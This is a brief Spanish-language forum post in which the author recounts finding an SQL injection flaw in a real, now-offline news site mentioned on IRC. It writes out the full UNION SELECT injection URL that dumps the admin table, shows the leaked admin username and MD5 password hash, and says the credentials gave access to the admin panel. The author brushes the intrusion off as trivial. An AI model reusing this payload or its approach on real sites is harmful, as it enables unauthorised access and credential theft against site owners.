Ahora esta caida la pagina, pero un dia alguien la paso por irc y probe a ver si era vulnerable a sqli y asi era, en concreto la inyección era esta: /noticias.php?id=-1+union+select+1,2,3,concat%28login,0x3a3a,password%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+admin_usuarios--Te salia admin::523af537946b79c4f8369ed39ba78605 que es "ad" encriptado en MD5. Con esas credenciales podias entrar al panel de administración y modificar la sección de noticias, nada del otro mundo xDD.Salu2